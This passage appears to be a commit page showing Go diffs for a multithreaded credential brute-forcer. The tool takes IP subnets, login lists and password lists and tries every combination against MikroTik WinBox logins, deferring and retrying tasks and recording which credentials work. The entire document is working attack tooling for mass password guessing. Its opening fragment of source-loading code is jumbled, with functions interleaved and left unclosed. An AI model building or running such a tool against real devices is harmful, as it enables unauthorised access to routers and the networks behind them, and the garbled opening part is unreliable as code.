ParseEndpoints(SrcIP.plain)
ParseEndpoints(SrcIP.contents)
log("src", 1, "ok: finished loading sources")
// both -1: exhausted
// both 0: not started yet
type SourcePos struct {
plainIdx int
contentIdx int
}
// CloseSources closes all source files.
func CloseSources() {
log("src", 1, "closing sources")
SrcIP.CloseSource()
SrcLogin.CloseSource()
SrcPassword.CloseSource()
log("src", 1, "ok: finished closing sources")
// String converts a SourcePos to its string representation.
func (pos *SourcePos) String() string {
return "P" + strconv.Itoa(pos.plainIdx) + "/C" + strconv.Itoa(pos.contentIdx)
}
func init() {
registerParam("ip", []string{}, "IPs or subnets in CIDR notation")
registerParam("ip-file", []string{}, "paths to files with IPs or subnets in CIDR notation (one entry per line)")
registerParam("login", []string{}, "one or more logins")
registerParam("login-file", []string{}, "paths to files with logins (one entry per line)")
registerParam("password", []string{}, "one or more passwords")
registerParam("password-file", []string{}, "paths to files with passwords (one entry per line)")
// Exhausted checks if a SourcePos can no longer produce any sources.
func (pos *SourcePos) Exhausted() bool {
return pos.plainIdx == -1 && pos.contentIdx == -1
}
registerSwitch("add-empty-password", "insert an empty password to the password list")
registerSwitch("no-password-trim", "preserve leading and trailing spaces in passwords")
registerSwitch("logins-first", "increment logins before passwords")
registerSwitch("file-contents-first", "try to go through source files first, defer commandline args for later")
// Reset moves a SourcePos to its starting position.
func (pos *SourcePos) Reset() {
pos.plainIdx = 0
pos.contentIdx = 0
log("src", 3, "resetting source pos")
}

@ -1,13 +1,22 @@
package main
import (
rbt "github.com/emirpasic/gods/trees/redblacktree"
rbtUtils "github.com/emirpasic/gods/utils"
"net"
"container/list"
"sync"
"time"
)
// deferredTasks is a list of tasks that were deferred for processing to a later time.
// This usually happens due to connection errors, protocol errors or per-endpoint limits.
var deferredTasks *list.List
// taskMutex is a mutex for safe handling of deferred task list.
var taskMutex sync.Mutex
func init() {
deferredTasks = list.New()
}
// TaskEvent represents all events that can be issued on a Task.
type TaskEvent int
@ -51,27 +60,14 @@ func (ev TaskEvent) String() string {
// A Task represents a single unit of workload.
// Every Task is linked to an Endpoint.
type Task struct {
e *Endpoint
login, password string
deferUntil time.Time
numDeferrals int
// this should not be in Task struct!
conn net.Conn
// ??? do we even need this here
good bool
e *Endpoint
login string
password string
deferUntil time.Time
numDeferrals int
listElement *list.Element // position in list
}
// maxSafeThreads is a safeguard to prevent creation of too many threads at once.
const maxSafeThreads = 5000
// deferredTasks is a list of tasks that were deferred for processing to a later time.
// This usually happens due to connection errors, protocol errors or per-endpoint limits.
var deferredTasks *rbt.Tree
// taskMutex is a mutex for safe handling of RB tree.
var taskMutex sync.Mutex
// String returns a string representation of a Task.
func (task *Task) String() string {
if task == nil {
@ -86,12 +82,7 @@ func (task *Task) Defer(addTime time.Duration) {
task.deferUntil = time.Now().Add(addTime)
task.numDeferrals++
// tell the endpoint that we got deferred,
// so it won't be selected until the deferral time has passed
// task.e.SetDeferralTime(task.deferUntil)
// FIXME: this isn't needed, endpoints can handle their own delays
maxDeferrals := CfgGetInt("task-max-deferrals")
maxDeferrals := getParamInt("task-max-deferrals")
if maxDeferrals != -1 && task.numDeferrals >= maxDeferrals {
log("task", 5, "giving up on task \"%v\" because it has exhausted its deferral limit (%v)", task, maxDeferrals)
return
@ -102,7 +93,9 @@ func (task *Task) Defer(addTime time.Duration) {
taskMutex.Lock()
defer taskMutex.Unlock()
deferredTasks.Put(task.deferUntil, task)
if task.listElement == nil {
task.listElement = deferredTasks.PushBack(task)
}
}
// EventWithParm tells a Task (and its underlying Endpoint) that
@ -115,21 +108,21 @@ func (task *Task) EventWithParm(event TaskEvent, parm any) bool {
return true // do not process generic events
}
res := task.e.EventWithParm(event, parm) // notify the endpoint first
endpointOk := task.e.EventWithParm(event, parm) // notify the endpoint first
switch event {
// on these events, defer a Task only if its Endpoint is being kept
case TE_NoResponse:
if res {
task.Defer(CfgGetDurationMS("no-response-delay-ms"))
if endpointOk {
task.Defer(getParamDurationMS("no-response-delay-ms"))
}
case TE_ReadFailed:
if res {
task.Defer(CfgGetDurationMS("read-error-delay-ms"))
if endpointOk {
task.Defer(getParamDurationMS("read-error-delay-ms"))
}
case TE_ProtocolError:
if res {
task.Defer(CfgGetDurationMS("protocol-error-delay-ms"))
if endpointOk {
task.Defer(getParamDurationMS("protocol-error-delay-ms"))
}
// report about a bad/good auth result
@ -144,7 +137,7 @@ func (task *Task) EventWithParm(event TaskEvent, parm any) bool {
time.Sleep(parm.(time.Duration))
}
return res
return endpointOk
}
// Event is a parameterless version of EventWithParm.
@ -156,42 +149,26 @@ func (task *Task) Event(event TaskEvent) bool {
func GetDeferredTask() (task *Task, waitTime time.Duration) {
currentTime := time.Now()
if deferredTasks.Empty() {
if deferredTasks.Len() == 0 {
log("task", 5, "deferred task list is empty")
return nil, 0
}
// check if a deferred task's endpoint is OK to fetch -
// sometimes, a task is OK to fetch but the endpoint was delayed by something else
it := deferredTasks.IteratorAt(deferredTasks.Left())
for {
k, v := it.Key().(time.Time), it.Value().(*Task)
minWaitTime := time.Time{}
if k.After(currentTime) {
log("task", 5, "deferred tasks cannot yet be processed at this time")
return nil, k.Sub(currentTime)
for e := deferredTasks.Front(); e != nil; e = e.Next() {
dt := e.Value.(*Task)
if minWaitTime.IsZero() || (dt.deferUntil.Before(minWaitTime) && dt.deferUntil.After(currentTime)) {
minWaitTime = dt.deferUntil
}
if k.Before(v.deferUntil) {
log("task", 5, "deferred task was re-deferred: removing its previous definition")
defer deferredTasks.Remove(k)
it.Next()
continue
if dt.deferUntil.Before(currentTime) && (dt.e.delayUntil.IsZero() || dt.e.delayUntil.Before(currentTime)) {
deferredTasks.Remove(e)
return dt, 0
}
if !v.e.delayUntil.IsZero() && v.e.delayUntil.After(currentTime) {
// skip this task: deferred task is OK, but its endpoint is delayed
it.Next()
continue
}
defer deferredTasks.Remove(k)
return v, 0
}
log("task", 5, "deferred tasks are OK for processing but their endpoints cannot yet be processed at this time")
return nil, 0
return nil, minWaitTime.Sub(currentTime)
}
// FetchTaskComponents returns all components needed to build a Task.
@ -240,46 +217,25 @@ func CreateTask() (task *Task, delay time.Duration) {
task, delayDeferred := GetDeferredTask()
if task != nil {
log("task", 4, "new task (deferred): %v", task)
task.conn = nil
task.good = false
return task, 0
}
ep, login, password, delaySource := FetchTaskComponents()
ep, login, password, delayEndpoint := FetchTaskComponents()
if ep == nil {
if delayDeferred == 0 && delaySource == 0 {
if delayDeferred == 0 && delayEndpoint == 0 {
log("task", 4, "cannot build task, no endpoint")
return nil, 0
} else if delayDeferred > delaySource || delayDeferred == 0 {
log("task", 4, "delaying task creation (by source delay) for %v", delaySource)
return nil, delaySource
} else if delayDeferred > delayEndpoint || delayDeferred == 0 {
log("task", 4, "delaying task creation (by endpoint delay) for %v", delayEndpoint)
return nil, delayEndpoint
} else {
log("task", 4, "delaying task creation (by deferred delay) for %v", delayDeferred)
return nil, delayDeferred
}
}
t := Task{}
t.e = ep
t.login = login
t.password = password
t.good = false
t := Task{e: ep, login: login, password: password}
log("task", 4, "new task: %v", &t)
return &t, 0
}
func init() {
deferredTasks = rbt.NewWith(rbtUtils.TimeComparator)
CfgRegister("threads", 3, "how many threads to use")
CfgRegister("thread-delay-ms", 10, "separate threads at startup for this amount of ms")
CfgRegister("connect-timeout-ms", 3000, "")
CfgRegister("read-timeout-ms", 2000, "")
// using a very high limit for now, but this should actually be set to -1
CfgRegister("task-max-deferrals", 30000, "how many deferrals are allowed for a single task. -1 to disable")
CfgRegisterAlias("t", "threads")
}

@ -1,112 +1,90 @@
package main
// thread.go: handling of worker threads
import (
"net"
"sync"
"time"
)
// threadWork processes a single work item for a thread.
func threadWork(dialer *net.Dialer) bool {
readTimeout := CfgGetDurationMS("read-timeout-ms")
// maxSafeThreads is a safeguard to prevent creation of too many threads at once.
const maxSafeThreads = 5000
// ThreadService creates, starts up and waits for all threads.
func ThreadService() {
numThreads := getParamInt("threads")
failIf(numThreads > maxSafeThreads, "too many threads (max %v)", maxSafeThreads)
log("thread", 0, "initializing %v threads", numThreads)
c := make(chan bool)
var wg sync.WaitGroup
for i := 1; i <= numThreads; i++ {
wg.Add(1)
go threadEntryPoint(c, i, &wg)
}
threadDelay := getParamDurationMS("thread-delay-ms")
log("thread", 0, "starting %v threads", numThreads)
for i := 1; i <= numThreads; i++ {
c <- true
if threadDelay > 0 {
time.Sleep(threadDelay)
}
}
log("thread", 1, "waiting for threads")
wg.Wait()
log("thread", 1, "finished waiting for threads")
}
// threadEntryPoint is the main entrypoint for a work thread.
func threadEntryPoint(c chan bool, threadIdx int, wg *sync.WaitGroup) {
<-c
log("thread", 3, "starting loop for thread %v", threadIdx)
for threadWork() {
}
log("thread", 3, "exiting thread %v", threadIdx)
wg.Done()
}
// threadWork processes a single work item for a thread.
func threadWork() bool {
task, delay := CreateTask()
if task == nil {
if delay > 0 {
log("thread", 3, "no endpoints available, sleeping for %v", delay)
log("thread", 3, "no active endpoints available, sleeping for %v", delay)
time.Sleep(delay)
return true
} else {
log("thread", 3, "no endpoints available, stopping thread loop")
log("thread", 3, "no endpoints available (active and deferred), stopping thread loop")
return false
}
}
conn, err := dialer.Dial("tcp", task.e.String())
conn, err := NewConnection(task.e)
if err != nil {
task.Event(TE_NoResponse)
log("thread", 2, "cannot connect to \"%v\": %v", task.e, err.Error())
task.EventWithParm(TE_NoResponse, err)
return true
}
defer conn.Close()
task.conn = conn
task.Event(TN_Connected)
conn.SetReadDeadline(time.Now().Add(readTimeout)) // should be just before Send() call...
log("thread", 2, "trying %v", task)
log("thread", 2, "trying %v:%v on \"%v\"", task.login, task.password, task.e)
// TODO: multiple services (currently just WinBox)
res, err := TryLogin(task, conn)
if err != nil {
task.Event(TE_ProtocolError)
} else {
if res && err == nil {
task.EventWithParm(TE_Good, task.login)
task.Event(TE_Good)
} else {
task.EventWithParm(TE_Bad, task.login)
task.Event(TE_Bad)
}
}
return true
}
// threadLoop calls threadWork in a loop, until the endpoints are exhausted,
// a pause/stop signal has been raised, or an exception has occurred in threadWork.
func threadLoop(dialer *net.Dialer) {
for threadWork(dialer) {
// TODO: pause/stop signal
// TODO: exception handling
}
}
// threadEntryPoint is the main entrypoint for a work thread.
func threadEntryPoint(c chan bool, threadIdx int, wg *sync.WaitGroup) {
<-c
log("thread", 3, "starting loop for thread %v", threadIdx)
connectTimeout := time.Duration(CfgGetInt("connect-timeout-ms")) * time.Millisecond
dialer := net.Dialer{Timeout: connectTimeout, KeepAlive: -1}
threadLoop(&dialer)
log("thread", 3, "exiting thread %v", threadIdx)
wg.Done()
}
// InitializeThreads creates and starts up all threads.
func InitializeThreads() *sync.WaitGroup {
numThreads := CfgGetInt("threads")
failIf(numThreads > maxSafeThreads, "too many threads (max %v)", maxSafeThreads)
log("thread", 0, "initializing %v threads", numThreads)
c := make(chan bool)
var wg sync.WaitGroup
for i := 1; i <= numThreads; i++ {
wg.Add(1)
go threadEntryPoint(c, i, &wg)
}
threadDelay := CfgGetDurationMS("thread-delay-ms")
log("thread", 0, "starting %v threads", numThreads)
for i := 1; i <= numThreads; i++ {
c <- true
if threadDelay > 0 {
time.Sleep(threadDelay)
}
}
log("thread", 0, "started")
return &wg
}
// WaitForThreads enters a wait state and keeps it until
// all threads have exited.
func WaitForThreads(wg *sync.WaitGroup) {
log("thread", 1, "waiting for threads")
wg.Wait()
log("thread", 1, "finished waiting for threads")
}

@ -3,21 +3,21 @@ package main
import (
"bytes"
"errors"
"net"
)
type Winbox struct {
task *Task
conn net.Conn
conn *Connection
stage int
user, pass string
w *WCurve
sa, xwa, xwb, j, z, secret, clientCC, serverCC, i, msg, resp []byte
xwaParity, xwbParity bool
user, pass string
w *WCurve
sa, xwa, xwb, j, z, secret, i []byte
clientCC, serverCC, msg, resp []byte
xwaParity, xwbParity bool
}
func NewWinbox(task *Task, conn net.Conn) *Winbox {
func NewWinbox(task *Task, conn *Connection) *Winbox {
winbox := Winbox{}
winbox.task = task
winbox.conn = conn
@ -138,7 +138,7 @@ func (winbox *Winbox) confirmation() error {
func (winbox *Winbox) sendAndRecv() error {
if len(winbox.msg) > 0 && winbox.conn != nil {
_, err := winbox.conn.Write(winbox.msg)
err := winbox.conn.Send(winbox.msg)
winbox.msg = []byte{}
if err != nil {
@ -146,14 +146,11 @@ func (winbox *Winbox) sendAndRecv() error {
return err
}
winbox.resp = make([]byte, 1024)
n, err := winbox.conn.Read(winbox.resp)
winbox.resp, err = winbox.conn.Recv()
if err != nil {
log("winbox", 1, "failed to recv: %v", err.Error())
return err
}
winbox.resp = winbox.resp[:n]
}
return nil

Loading…
Cancel
Save